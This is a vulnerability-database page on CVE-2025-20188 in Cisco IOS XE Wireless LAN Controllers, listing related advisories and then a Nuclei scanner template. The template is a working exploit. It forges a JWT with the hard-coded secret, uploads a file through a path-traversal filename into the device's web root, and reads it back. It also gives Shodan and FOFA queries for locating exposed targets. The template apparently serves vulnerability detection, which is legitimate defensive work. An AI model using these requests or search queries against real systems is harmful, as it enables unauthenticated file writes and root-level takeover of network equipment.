| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The vulnerability of the access point loading function in Cisco IOS XE wireless local control devices allows a attacker to execute arbitrary commands. | 9 May 202500:00 | – | bdu_fstec | |
| CVE-2025-20188 | 7 May 202518:41 | – | circl | |
| Cisco IOS XE Wireless Controller Software Arbitrary File Upload Vulnerability | 7 May 202516:00 | – | cisco | |
| Cisco IOS XE Wireless Controller Arbitrary File Upload (cisco-sa-wlc-file-uplpd-rHZG9UfC) | 15 May 202500:00 | – | nessus | |
| Cisco IOS XE 信任管理问题漏洞 | 7 May 202500:00 | – | cnnvd | |
| CVE-2025-20188 | 7 May 202517:34 | – | cve | |
| CVE-2025-20188 | 7 May 202517:34 | – | cvelist | |
| EUVD-2025-13907 | 3 Oct 202520:07 | – | euvd | |
| Vulnerabilities fixed in Cisco IOS XE Software | 8 May 202508:43 | – | ncsc | |
| CVE-2025-20188 | 7 May 202518:15 | – | nvd |
id: CVE-2025-20188
info:
name: Cisco IOS XE WLC - Arbitrary File Upload
author: iamnoooob,pdresearch,DhiyaneshDK
severity: critical
description: |
A vulnerability in the Out-of-Band Access Point (AP) Image Download feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system.This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system.An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP image download interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.
impact: |
Unauthenticated attackers can exploit hard-coded JWT tokens to upload arbitrary files and execute commands with root privileges on Cisco IOS XE WLC devices, leading to complete device compromise and potential network-wide access.
remediation: |
Apply the patch provided in Cisco Security Advisory cisco-sa-wlc-file-uplpd-rHZG9UfC.
reference:
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
- https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-20188
cwe-id: CWE-798
epss-score: 0.17894
epss-percentile: 0.96814
metadata:
verified: true
max-request: 2
fofa-query: '"IOS-Self-Signed-Certificate" && port="8443"'
shodan-query: 'http.html_hash:1076109428 ssl.cert.issuer.cn:"IOS-Self-Signed-Certificate" port:8443'
tags: cve,cve2025,cisco,file-upload,intrusive,rce,vkev,vuln
flow: |
if (http(1)) {
http(2) && http(3)
}
variables:
exp: "{{unix_time(10000)}}"
secret: "notfound"
payload: '{"reqid":"cdb_token_request_id1","exp":{{exp}}}'
filename: "{{randbase(8)}}"
path: "usr/binos/openresty/nginx/html/"
string: "{{to_lower('{{randstr}}')}}"
http:
- raw:
- |
POST /ap_spec_rec/upload/ HTTP/1.1
Host: {{Hostname}}
Cookie: jwt={{randstr}}
Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
Accept-Encoding: gzip
--------------------------NCpI6tN3BZW3fz1Y9t2bkf
Content-Disposition: form-data; name="file"; filename="../..{{path}}/{{filename}}.txt"
Content-Type: text/plain
{{string}}
--------------------------NCpI6tN3BZW3fz1Y9t2bkf--
matchers:
- type: dsl
dsl:
- "status_code == 401"
- "contains(body, 'invalid jwt string')"
condition: and
internal: true
- raw:
- |
POST /ap_spec_rec/upload/ HTTP/1.1
Host: {{Hostname}}
Cookie: jwt={{ generate_jwt(payload,"HS256",secret) }}
Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
Accept-Encoding: gzip
--------------------------NCpI6tN3BZW3fz1Y9t2bkf
Content-Disposition: form-data; name="file"; filename="../../{{path}}{{filename}}.txt"
Content-Type: text/plain
{{string}}
--------------------------NCpI6tN3BZW3fz1Y9t2bkf--
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(header, 'openresty')"
condition: and
- raw:
- |
GET /{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '{{string}}')"
condition: and
# digest: 490a0046304402202902a123ef89e331c32e2a6c5ee9a97a838e4ff1b87543f70baa7906e9ad1e8b022029d911449cebd5a9e0ff06df4e7729157ac0f747e29c93758858e92d17be5cf6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation